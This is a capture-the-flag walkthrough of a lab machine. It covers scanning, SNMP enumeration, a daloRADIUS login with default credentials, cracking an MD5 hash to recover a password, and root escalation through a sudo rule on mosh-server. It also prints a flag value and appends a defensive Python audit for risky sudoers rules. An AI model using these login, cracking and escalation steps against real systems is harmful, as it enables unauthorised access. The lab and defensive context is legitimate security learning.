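The port scan finds ports 22 and 80 open.
dirsearch does not turn up anything useful.
An nmap scan of the UDP ports shows port 161 open, running an SNMP v1/v2 service.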
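-A: gathers detailed information about the target host, including the operating system, service versions, and script scan results.
-sV: gets service version information.
-Pn: skips host discovery and scans the target directly.
-sU: scans the target host's UDP ports.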
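Walking the service with snmpwalk reveals a key piece of information: daloradius.
Searching for index.php turns up several routes, such as daloradius/app/users/index.php.
This leads to a login page. Looking up the default initial credentials and trying them fails, annoyingly, with a wrong username/password error.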
Installing daloRADIUS · lirantal/daloradius Wiki
- Username: administrator
- Password: radius
There is another login page: /daloradius/app/operators/login.php
Login succeeds.
Looking around, the most useful information is under Users.
Crack the hash with hashcat:
echo 412DD4759978ACFCC81DEAB01B382403 > hash
hashcat -m 0 -a 0 hash /usr/share/wordlists/rockyou.txt
underwaterfriends
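Try SSH.
As with the earlier Starting Point machines, run sudo -l to list the commands the current user may run with sudo; mosh-server can be run with sudo.
mosh is used with SSH; mosh-server is the server side.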
svcMosh@underpass:~$ mosh-server -h
Usage: mosh-server new [-s] [-v] [-i LOCALADDR] [-p PORT[:PORT2]] [-c COLORS] [-l NAME=VALUE] [-- COMMAND...]
svcMosh@underpass:~$ mosh -h
Usage: /usr/bin/mosh [options] [--] [user@]host [command...]
--client=PATH mosh client on local machine
(default: "mosh-client")
--server=COMMAND mosh server on remote machine
(default: "mosh-server")
--predict=adaptive local echo for slower links [default]
-a --predict=always use local echo even on fast links
-n --predict=never never use local echo
--predict=experimental aggressively echo even when incorrect
-4 --family=inet use IPv4 only
-6 --family=inet6 use IPv6 only
--family=auto autodetect network type for single-family hosts only
--family=all try all network types
--family=prefer-inet use all network types, but try IPv4 first [default]
--family=prefer-inet6 use all network types, but try IPv6 first
-p PORT[:PORT2]
--port=PORT[:PORT2] server-side UDP port or range
(No effect on server-side SSH port)
--bind-server={ssh|any|IP} ask the server to reply from an IP address
(default: "ssh")
--ssh=COMMAND ssh command to run when setting up session
(example: "ssh -p 2222")
(default: "ssh")
--no-ssh-pty do not allocate a pseudo tty on ssh connection
--no-init do not send terminal initialization string
--local run mosh-server locally without using ssh
--experimental-remote-ip=(local|remote|proxy) select the method for
discovering the remote IP address to use for mosh
(default: "proxy")
--help this message
--version version and copyright information
Please report bugs to mosh-devel@mit.edu.
Mosh home page: https://mosh.org
--server=COMMAND can be used to specify the remote mosh-server command; the default is mosh-server.
mosh 127.0.0.1
mosh --server="mosh-server" 127.0.0.1
# The two commands above are equivalent
mosh-server can be run with sudo. If --server points the remote server side at the sudo version of mosh-server, can that escalate to root?
mosh --server="sudo mosh-server" 127.0.0.1
9290acda8a407b44cc0ff956e1b2d870
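Added example (not part of the original write-up): a defensive audit in Python for the misconfiguration used above, a sudo rule that lets an account run mosh-server as root even though its usage line ends in [-- COMMAND...]. The function name audit_sudoers, the sudoers fragment, every account other than svcMosh, and the COMMAND_RUNNERS list are constructed for illustration.

```python
import re

# Illustrative, non-exhaustive list (an assumption of this example): programs that
# start a shell or a caller-supplied command. mosh-server is listed because its
# usage line ends in "[-- COMMAND...]".
COMMAND_RUNNERS = {"mosh-server", "env", "find", "vim", "bash", "sh"}

RULE = re.compile(r"^(?P<who>\S+)\s+(?P<hosts>\S+?)\s*=\s*"
                  r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$")

# Constructed sudoers fragment; only the svcMosh/mosh-server pairing is from the write-up.
SAMPLE = """\
Defaults env_reset
svcMosh ALL=(ALL) NOPASSWD: /usr/bin/mosh-server
backup  ALL=(root) /usr/bin/rsync -a /srv/ /mnt/backup/
deploy  ALL=(www-data) NOPASSWD: /usr/bin/env
ops     ALL=(ALL : ALL) /usr/bin/systemctl restart nginx, /usr/bin/find
"""

def audit_sudoers(text):
    """Return (user, run_as, command, reason) for each rule that amounts to root."""
    findings = []
    for line in (raw.strip() for raw in text.splitlines()):
        first = line.split(None, 1)[0] if line else "#"
        if first.startswith(("#", "Defaults")) or first.endswith("_Alias"):
            continue
        m = RULE.match(line)
        if not m:
            continue
        runas = (m.group("runas") or "root").split(":")[0].strip()
        if runas not in ("root", "ALL"):
            continue  # rule does not grant root
        nopasswd = "NOPASSWD:" in m.group("rest")
        rest = re.sub(r"\b[A-Z_]+:\s*", "", m.group("rest"))  # drop tags like NOPASSWD:
        for cmd in (c.strip() for c in rest.split(",")):
            parts = cmd.split()
            if cmd == "ALL":
                reason = "unrestricted sudo"
            elif len(parts) == 1 and parts[0].rsplit("/", 1)[-1] in COMMAND_RUNNERS:
                # no argument list in sudoers means any arguments are allowed
                reason = parts[0] + " can start arbitrary commands; arguments unrestricted"
            else:
                continue
            tag = " (NOPASSWD)" if nopasswd else ""
            findings.append((m.group("who"), runas, cmd, reason + tag))
    return findings

if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE):
        print(finding)
```

On the constructed sample this reports the svcMosh rule and the unrestricted /usr/bin/find entry for ops, and skips the rule that only runs as www-data.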